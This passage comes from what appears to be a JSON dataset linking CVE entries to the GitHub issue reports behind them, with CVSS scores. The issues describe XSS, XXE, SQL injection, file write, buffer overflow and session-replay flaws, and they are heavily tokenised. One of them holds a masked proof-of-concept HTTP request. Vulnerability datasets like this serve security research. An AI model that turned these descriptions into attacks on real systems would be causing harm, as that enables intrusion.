        "description": "History page parses and renders html tags. While visiting this page URLTAG which has an html input element as it's title ( APITAG ), I noticed that it got parsed like HTML and actually displays the rendered element in the PATHTAG page, whereas expected/desired behavoir would be the website title being displayed in plain text. I then searched a bunch of unclosed html tags in google, a APITAG and an APITAG . The NUMBERTAG topmost items in this screenshot show that it all get's evaluated: FILETAG Version Information: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000620",
        "Issue_Url_old": "https://github.com/hapijs/cryptiles/issues/34",
        "Issue_Url_new": "https://github.com/hapijs/cryptiles/issues/34",
        "Repo_new": "hapijs/cryptiles",
        "Issue_Created_At": "2018-06-24T04:05:37Z",
        "description": "APITAG generates biased random digits. Reported by Microsoft Vulnerability Research: MSVR NUMBERTAG The APITAG method generates digits that lack a perfect distribution over enough attempts.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000636",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2435",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2435",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2018-07-24T09:16:56Z",
        "description": "Null pointer dereference in jmem heap. Jerry Version: f NUMBERTAG d NUMBERTAG Build command: APITAG OS: Ubuntu NUMBERTAG Test case: APITAG Result: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bc1 bp NUMBERTAG sp NUMBERTAG fff3cb1ba NUMBERTAG T NUMBERTAG bc0 in jmem_heap_free_block PATHTAG NUMBERTAG PATHTAG NUMBERTAG in ecma_builtin_dispatch_routine PATHTAG NUMBERTAG in ecma_builtin_dispatch_call PATHTAG NUMBERTAG in ecma_op_function_call PATHTAG NUMBERTAG f5 in opfunc_call PATHTAG NUMBERTAG f5 in vm_execute PATHTAG NUMBERTAG fda in vm_run PATHTAG NUMBERTAG in vm_run_eval PATHTAG NUMBERTAG in ecma_op_eval_chars_buffer PATHTAG NUMBERTAG f in jerry_eval PATHTAG NUMBERTAG f in main jerry main/main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG jmem_heap_free_block NUMBERTAG ABORTING Immediate cause: It seems that this bug is caused by triggering undefined behavior at PATHTAG The second passed argument is NULL. This causes NULL dereference and allows GCC to optimize out subsequent checks for NULL. This further causes writing to null pointer, which results in a segmentation fault. Note, that because this bug occurs due to gcc optimizing out a check for NULL, this may not be reproducible with a debug build. Please confirm if you can reproduce this issue. This bug was discovered by Marcin Dominiak and Wojciech Rauner.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000638",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/20",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/20",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-08-03T10:10:25Z",
        "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability poc : GET PATHTAG NUMBERTAG E NUMBERTAG Ca NUMBERTAG E HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Cache Control: max age NUMBERTAG reason : FILETAG result : FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000639",
        "Issue_Url_old": "https://github.com/arnobl/latexdraw/issues/10",
        "Issue_Url_new": "https://github.com/latexdraw/latexdraw/issues/10",
        "Repo_new": "latexdraw/latexdraw",
        "Issue_Created_At": "2018-07-18T13:07:14Z",
        "description": "XXE in SVG Parsing. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured The following code snippet sets an SVG Entity resolver and parses the SVG file retrieved from the URL: URLTAG To exploit this issue, create an SVG file with the following code: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000640",
        "Issue_Url_old": "https://github.com/villagedefrance/OpenCart-Overclocked/issues/190",
        "Issue_Url_new": "https://github.com/villagedefrance/opencart-overclocked/issues/190",
        "Repo_new": "villagedefrance/opencart-overclocked",
        "Issue_Created_At": "2018-07-18T13:19:30Z",
        "description": "Reflected XSS in APITAG Template. The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim's browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occured The following code shows that the APITAG variable is reflected to the victim's browser without any input validation, leading to reflected XSS: URLTAG An example payload for the token variable is given below: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000641",
        "Issue_Url_old": "https://github.com/YesWiki/yeswiki/issues/356",
        "Issue_Url_new": "https://github.com/yeswiki/yeswiki/issues/356",
        "Repo_new": "yeswiki/yeswiki",
        "Issue_Created_At": "2018-07-19T09:39:08Z",
        "description": "PHP Objection Injection. The Issue PHP Object Deserialization Injection attacks utilise the unserialize function within PHP. The deserialisation of the PHP object can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code within the APITAG project containing the vulnerable code: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000642",
        "Issue_Url_old": "https://github.com/Ysurac/FlightAirMap/issues/410",
        "Issue_Url_new": "https://github.com/ysurac/flightairmap/issues/410",
        "Repo_new": "ysurac/flightairmap",
        "Issue_Created_At": "2018-07-19T09:49:30Z",
        "description": "Reflected XSS in FILETAG . The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim's browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occurred The following code shows that the APITAG variable is reflected to the victim's browser without any input validation, leading to reflected XSS: URLTAG An example payload for the registration variable is given below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000644",
        "Issue_Url_old": "https://github.com/eclipse/rdf4j/issues/1056",
        "Issue_Url_new": "https://github.com/eclipse/rdf4j/issues/1056",
        "Repo_new": "eclipse/rdf4j",
        "Issue_Created_At": "2018-07-19T11:45:15Z",
        "description": "XXE in XML Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without disabling entities: URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000645",
        "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1210",
        "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1210",
        "Repo_new": "librehealthio/lh-ehr",
        "Issue_Created_At": "2018-07-23T11:35:05Z",
        "description": "Authenticated Local File Disclosure in FILETAG . The Issue Local file disclosure is a vulnerability which allows an attacker to disclose the contents of files on the server. An attacker can use this vulnerability to disclose the contents of sensitive files like APITAG , config files, etc. In lh ehr, an attacker must be authenticated to perform this attack. Should the attacker know the path to a file and the web server user has sufficient access to read the file, the contents of the file will be echoed in the page. Where the Issue Occurred The following code snippet displays the usage of the APITAG function in PHP within the lh ehr application: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000646",
        "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1211",
        "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1211",
        "Repo_new": "librehealthio/lh-ehr",
        "Issue_Created_At": "2018-07-23T11:42:50Z",
        "description": "Authenticated Unrestricted File Write in FILETAG . The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution Where the Issue Occurred The following code snippet displays the usage of the APITAG function in PHP within the lh ehr application: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000647",
        "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1212",
        "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1212",
        "Repo_new": "librehealthio/lh-ehr",
        "Issue_Created_At": "2018-07-23T11:49:10Z",
        "description": "Authenticated Unrestricted File Deletion . The Issue Unrestricted file deletion vulnerabilities are caused by overly trusting a user's input and allowing the user to manipulate the path of the file to be deleted. This may allow an attacker to create a denial of service scenario. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displays the usage of the ERRORTAG function in PHP within the lh ehr application: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000648",
        "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1213",
        "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1213",
        "Repo_new": "librehealthio/lh-ehr",
        "Issue_Created_At": "2018-07-23T11:57:29Z",
        "description": "Authenticated Unrestricted File Write in FILETAG . The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displaya the usage of the fopen function in PHP within the lh ehr application: URLTAG This creates or overwrites a file that the web server user has access to. The following code snippet displays writing user controlled content within the user controlled file: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000649",
        "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1214",
        "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1214",
        "Repo_new": "librehealthio/lh-ehr",
        "Issue_Created_At": "2018-07-23T12:10:18Z",
        "description": "Authenticated Unrestricted File Write in FILETAG NUMBERTAG The Issue Unrestricted file write vulnerabilities allow attackers to write file such as PHP files, in locations where the web server user has access to write. This may allow an attacker to write files with malicious content and may lead to remote code execution. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet displays the usage of the fopen function in PHP within the lh ehr application: URLTAG This creates or overwrites a file that the web server user has access to. The following code snippet displays writing user controlled content within the user controlled file: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000650",
        "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1215",
        "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1215",
        "Repo_new": "librehealthio/lh-ehr",
        "Issue_Created_At": "2018-07-23T12:22:06Z",
        "description": "Authenticated SQL Injection in FILETAG . The Issue SQL Injections are vulnerabilities in which the developer overly trusts user controlled input. This allows an attacker to perform malicious queries upon the database, which can lead to compromise of all data within the database and question the integrity of the data. An attacker must be authenticated to perform this attack. Where the Issue Occurred The following code snippet shows the SQL query being created with a tainted variable: URLTAG The following code snippet show the above mentioned SQL query being executed: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000652",
        "Issue_Url_old": "https://github.com/JabRef/jabref/issues/4229",
        "Issue_Url_new": "https://github.com/jabref/jabref/issues/4229",
        "Repo_new": "jabref/jabref",
        "Issue_Created_At": "2018-07-23T12:31:45Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippet displays the usage of APITAG without disabling entities: URLTAG The following code snippet displays the parsing of the XML: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000657",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/44800",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/44800",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2017-09-24T00:57:53Z",
        "description": "seg fault pushing on either side of a APITAG I've been seeing lots of bad behavior trying to use APITAG I've boiled it down to a relatively simple example which shows some of the bad behavior I was seeing and additionally seg faults. This was with: rustc NUMBERTAG f3d NUMBERTAG f NUMBERTAG binary: rustc commit hash: APITAG commit date NUMBERTAG host NUMBERTAG apple darwin release NUMBERTAG LLVM version NUMBERTAG and also rust NUMBERTAG The output I expect to see is: > old packet NUMBERTAG pushing D NUMBERTAG FB A8 > new packet NUMBERTAG D NUMBERTAG FB A8 The output I get is: > old packet NUMBERTAG pushing D NUMBERTAG FB A8 > new packet NUMBERTAG FB A8 > Segmentation fault NUMBERTAG Note that the fourth from the last byte should be D9. Work around seems to be to use a large APITAG capacity. Here's the code: CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1000660",
        "Issue_Url_old": "https://github.com/tock/tock/issues/1147",
        "Issue_Url_new": "https://github.com/tock/tock/issues/1147",
        "Repo_new": "tock/tock",
        "Issue_Created_At": "2018-08-07T18:27:40Z",
        "description": "Package name can potentially access all flash and ram. I haven't written code that exploits the bug yet, so it is just a theoretical bug. Summary If you are using a TBF version NUMBERTAG there is no check on the length of the package name, so it could be as large as all the flash memory available. Since the package name is public, every capsule could have unrestricted read access to all memory, using only safe code. Exploiting the bug There are two ways of exploiting the bug: One could create a User process using a APITAG with an arbitrary large package name length, and later on a Capsule could use its package name to read arbitrary memory. Or, a capsule could call the safe function \"get_package_name\" with a raw pointer that points to a fake TBF version NUMBERTAG header and use it to read the data anywhere by using the package name offset and length. Code: Inside process.rs lines NUMBERTAG APITAG Now lines NUMBERTAG and NUMBERTAG inside the function create: APITAG And at last, inside the function APITAG ERRORTAG There are no checks for either pkg_name_offset nor pkg_name_size. Proposed solutions First the APITAG should probably be made unsafe, and then either some package name size check should be placed (either in the get package name function, or in the parse_and_validate_tbf_header function) or the support for NUMBERTAG header should be dropped.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000666",
        "Issue_Url_old": "https://github.com/0-complexity/openvcloud/issues/1207",
        "Issue_Url_new": "https://github.com/0-complexity/openvcloud/issues/1207",
        "Repo_new": "0-complexity/openvcloud",
        "Issue_Created_At": "2018-01-16T19:45:44Z",
        "description": "Some weird feature in portal make portal crash. Detailed description Try to figure out what procued undeneath stacktrace Steps to reproduce ? Relevant stacktraces CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000667",
        "Issue_Url_old": "https://github.com/cyrillos/nasm/issues/3",
        "Issue_Url_new": "https://github.com/cyrillos/nasm/issues/3",
        "Repo_new": "cyrillos/nasm",
        "Issue_Created_At": "2018-08-22T14:10:55Z",
        "description": "crash found by fuzzing. I fuzzing the nasm using smart fuzzer, and find a crash of nasm. The crash info is as follow: ERRORTAG I debug the program, and the crash is caused by function assemble_file(inname, depend_ptr) at APITAG Please check it. The POC is in the attachment. FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1000671",
        "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/268",
        "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/268",
        "Repo_new": "sympa-community/sympa",
        "Issue_Created_At": "2018-04-16T08:00:42Z",
        "description": "Possible XSS. The following link redirects to bing: URLTAG It also works in NUMBERTAG We have no newer sympa to test with. It seems to me maybe this is a bug in a perl dependency? I couldn't find \"referer\" directly in sympa's source code during a (very) cursory grep.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000800",
        "Issue_Url_old": "https://github.com/zephyrproject-rtos/zephyr/issues/7638",
        "Issue_Url_new": "https://github.com/zephyrproject-rtos/zephyr/issues/7638",
        "Repo_new": "zephyrproject-rtos/zephyr",
        "Issue_Created_At": "2018-05-17T20:10:19Z",
        "description": "get FAULT when fuzzing sys_ring_buf_ put and sys_ring_bug_get APIs. I am trying to fuzzing the kernel APIs, and I wrote a simple application to call the APIs: sys_ring_buf_put and sys_ring_buf_get. the code is as below CODETAG when I run the application, it result in USEAGE FAULT as following: CODETAG Should zephyr add some checks like type and bound check in the implementation of syscall API code ?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000804",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/594",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/594",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-09T14:57:04Z",
        "description": "Stack based buffer overflow while parsing AQL (parsing next token). Function next_token that provides next token during AQL parsing tries to memcpy input data (part of AQL files) into fixed size buffer. Allocated buffer can fit only DB_MAX_ELEMENT_SIZE NUMBERTAG bytes and the check is missing. Crash line: aql APITAG Declaration of buffer: APITAG typedef char value_t[DB_MAX_ELEMENT_SIZE]; APITAG define DB_MAX_ELEMENT_SIZE NUMBERTAG APITAG value_t value; aql APITAG NUMBERTAG int lexer_start(lexer_t lexer, char input, token_t token, value_t value) { lexer >input = input; lexer >prev_pos = input; lexer >token = token; lexer >value = value; Overflow: aql APITAG memcpy(lexer >value, s, length); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Following AQL code will trigger crash APITAG APITAG Mitigation : The size of input token should be limited to DB_MAX_ELEMENT_SIZE. Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): URLTAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc6d2ca NUMBERTAG at pc NUMBERTAG f1b NUMBERTAG c NUMBERTAG bp NUMBERTAG ffc6d2ca NUMBERTAG sp NUMBERTAG ffc6d2c9a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc6d2ca NUMBERTAG thread T NUMBERTAG f1b NUMBERTAG c NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG c NUMBERTAG in next_token PATHTAG NUMBERTAG c NUMBERTAG in lexer_next PATHTAG NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f1b NUMBERTAG d8a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffc6d2ca NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in aql_parse PATHTAG This frame has NUMBERTAG object(s NUMBERTAG token NUMBERTAG le NUMBERTAG name NUMBERTAG alue' APITAG NUMBERTAG da NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f4 f3 f3 f3 f NUMBERTAG da NUMBERTAG f1 f1 f1 f NUMBERTAG da NUMBERTAG a NUMBERTAG da NUMBERTAG b NUMBERTAG f4 f4 f4 f3 f NUMBERTAG da NUMBERTAG c0: f3 f NUMBERTAG da NUMBERTAG d NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000805",
        "Issue_Url_old": "https://github.com/paramiko/paramiko/issues/1283",
        "Issue_Url_new": "https://github.com/paramiko/paramiko/issues/1283",
        "Repo_new": "paramiko/paramiko",
        "Issue_Created_At": "2018-09-06T22:55:57Z",
        "description": "CVE PENDING] Server side auth vulnerability [DESC TK]. Placeholder for a not yet public security vulnerability on Paramiko's server side ( NOT client side), as reported by Daniel Hoffman of [usd AG URLTAG . I was emailed by the above on APITAG and (due to being on vacation at the time) was able to review the initial information on today's day APITAG Daniel submitted the following: sample vanilla enough server side code loop (using standard/public API members with no additions besides logging and specification of expected auth mechanisms) sample client side code which exploits the vulnerability in the server (TK) detailed explanation of why the exploit works, with references to parts of Paramiko's server side code recommended fix At time of writing, I have done a cursory read of the code snippets & explanation, and confirmed that the sample code does appear to exhibit the described exploit. Next steps for me: [ ] take up Daniel on his offer to create a CVE; less work for me, but also, a security company has more experience with that process than I do, namely \"any at all\" [ ] double check the details of the vulnerability so that I understand it more deeply [ ] consider whether the suggested fix is valid (it has to do with Paramiko's reuse of code across client/server use cases) [ ] confirm exploit & fix are both valid to NUMBERTAG APITAG (at present I am still considering NUMBERTAG to be pseudo LTS and getting bugfixes, though this will soon cease) and up [ ] test, patch, confirm [ ] changelog entry [ ] merge up to all branches [ ] push & release at once so fix is live [ ] update this ticket with my notes/real description [ ] send a security notice out via Tidelift",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000809",
        "Issue_Url_old": "https://github.com/privacyidea/privacyidea/issues/1227",
        "Issue_Url_new": "https://github.com/privacyidea/privacyidea/issues/1227",
        "Repo_new": "privacyidea/privacyidea",
        "Issue_Created_At": "2018-09-07T09:02:49Z",
        "description": "Failcounter increments on every token without a PIN when the user= parameter just has a APITAG . The failcounter increments on every token without a PIN when the user= parameter just has a APITAG . In our case this resulted basically in a denial of service of our two factor authentication system, as by default any fail counter over NUMBERTAG will lock the token out. What did you try to do? Have tokens without PIN, for example in our setup we have HOTP, TOTP and VASCO tokens without PIN. Then a request with a user= APITAG will increment the failcounter for all these tokens. For example with httpie: APITAG Or with curl: APITAG This will return: \" wrong otp value \" and increment all failcounters by NUMBERTAG What outcome did you expect? Since the user= parameter does not match any user in privacyidea with a token, i was expecting it to just deny/drop the request. What outcome did you experience? All tokens verifications were blocked because all failcounters where incremented to their current max of NUMBERTAG And any valid check would output the following \"matching NUMBERTAG tokens, Failcounter exceeded\" . Configuration Tested on APITAG NUMBERTAG and NUMBERTAG Debian stable, virtualenv. Extra information I'm suspecting something wrong in the logic of PATHTAG L NUMBERTAG URLTAG , so that this is matching all tokens without a PIN. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000811",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/812",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/812",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2018-10-02T18:30:47Z",
        "description": "Arbitrary File Upload Security. Hi There, I was trying the application for a while and noticed that a regular user ( Editor role ) can upload arbitrary file, in this case a PHP file. By then he can run remote PHP command on server context. Is it OK to describe the vulnerability here ? or you prefer to send it in private ? Thanks.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000814",
        "Issue_Url_old": "https://github.com/aio-libs/aiohttp-session/issues/325",
        "Issue_Url_new": "https://github.com/aio-libs/aiohttp-session/issues/325",
        "Repo_new": "aio-libs/aiohttp-session",
        "Issue_Created_At": "2018-10-08T19:29:39Z",
        "description": "Improper Session Expiration in storages with no inherent expiration. Storages that lack inherent data expiration APITAG APITAG (out of scope, it's inherently insecure) APITAG appear to do improper Session Expiration. A user that has obtained a legitimate session, can do a replay attack recreating his / her cookie (with the same value as the original) thus defeating the purpose of cookie expiry. This impacts security in the sense that it increases the attack window for session attacks practically providing infinite lifespan tokens. This falls under OWASP's OTG SESS NUMBERTAG URLTAG APITAG Session Timeout) test and more specifically under the 'ensuring that it is not possible to \u201creuse\u201d the same session' clause. APITAG Using a slight variation of APITAG : ERRORTAG And a client that logs in, saves the value of the cookie and re creates it after expiry: ERRORTAG Running both will result in the following output on the client: ERRORTAG The above shows that the expired session was successfully used simply by re creating the cookie. Remedy For fernet, documentation URLTAG indicates that there is a ttl option to decrypt that should suffice. I am preparing a PR for this. Unfortunately I couldn't find anything related for APITAG My only though on this is to add the created time in the message itself for APITAG and check it on load_session (maybe issue a warning if an expired token was presented). I would like some feedback / thoughts on this.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
